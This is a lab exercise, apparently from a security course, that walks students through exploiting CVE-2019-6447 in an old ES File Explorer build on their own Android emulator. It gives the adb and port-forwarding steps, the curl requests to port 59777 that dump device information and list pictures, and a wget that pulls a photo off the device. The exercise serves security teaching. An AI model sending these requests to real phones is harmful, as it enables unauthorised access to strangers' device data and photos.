M 207: ES Explorer Command Injection (10 pts + 10 extra)

What You Need for This Project

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:

Find your Android Device's IP Address

Launch your Android emulator. In Settings, find your device's IP address, as shown below.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Android device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

Linux

If you are using a Linux machine to run adb, execute these commands, replacing the IP address with the IP address of your Android device:
adb connect 172.16.123.154:5555
adb devices -l
You should see your Android device in the "List of devices attached", as shown below.

Android Studio

If you are using the Android Studio emulator, Launch Android Studio and click Tools, "SDK Manager".

Find the Android SDK Location, outlined in green in the image below.

In a Terminal or Command Prompt, execute the commands below, replacing the path in the first command with the correct Android SDK Location on your system.

cd /Users/sambowne/Library/Android/sdk
cd platform-tools
./adb devices -l
You should see your Android device in the "List of devices attached", as shown below.

Viewing the Listening Process

Execute these commands, one at a time:
adb shell
netstat -pant 2>/dev/null | grep LISTEN
exit
You see a process listening on port 59777, as shown below.

Forwarding a Port

To connect to your Android device from your host machine, or a Linux virtual machine, you can use port forwarding.

If you are using a Mac or Linux machine, execute this command:

adb forward tcp:59777 tcp:59777
The response is to echo the port number 59777, as shown below.

Windows Users

In a Command Prompt window, in the "platform-tools" directory, execute these commands:
adb kill-server
adb -a nodaemon server start
Leave that Command Prompt window open.

Open a new Command Prompt window. Change directory to the "platform-tools" directory, and execute these commands:

adb forward tcp:59777 tcp:59777
netstat -an -p tcp
You should see the arbitrary address 0.0.0.0 LISTENING on port 59777.

Install Windows Subsystem for Linux and Ubuntu, as explained here.

In a Ubuntu command prompt window, execute this command:

cat /etc/resolv.conf
This shows the IP address of your Windows system.

In the Ubuntu command prompt window, execute this command, replacing 127.0.0.1 with the correct address for your Windows system:

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
If you cannot install Windows Subsystem for Linux, we used a Windows install of curl successfully with this modified command:
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"getDeviceInfo\"}" http://127.0.0.1:59777

M 207.1: ftpPort (10 pts)

Execute this command to load information from the ES File Explorer process:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
You see information about your phone, as shown below.

Find the text covered by a green box in the image above. That's the flag.

Extra Credit: Connect to a Camera

Genymotion

If you have a webcam and you are using Genymotion, you can do this.

In Android, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

Android Studio Emulator

Open Android Studio. Close your emulated device.

On the right side, in Device Manager, click the pencil icon to edit your emulated device, outlined in green in the image below.

At the bottom of the next window, click the "Show Advanced Settings" button.

In the next window, switch a Camera to Webcam0, outlined in green in the image below.

Now launch Android Studio, launch the emulator, open ES File Explorer, and configure port forwarding again.

Extra Credit: Steal a Photo

On your Android device, open the Camera app and take a photo, as shown below.

Click Finish.

Start your emulator. Launch the Camera app and take a photo.

In a Terminal or Command Prompt, execute this command:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://127.0.0.1:59777
Find the path to your image in the output, as shown below.

M 207.2 Image Path (10 pts extra)

The flag is covered by a green rectangle in the image below.

Execute this command, replacing the image path with the correct values for your system:
wget http://127.0.0.1:59777//XXXXXXX/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads, as shown below.

In the GUI, navigate to the file and double-click it to open it, as shown below.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command-line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.


Converted to a CTF 2-28-19
Extra credit explanation added 2-21-2020
Updated on 2-10-21
Updated to include Android Studio 9-19-22
Windows WSL instructions added 10-4-22
Flag number updated 6-21-23
Curl for Window command added 7-15-24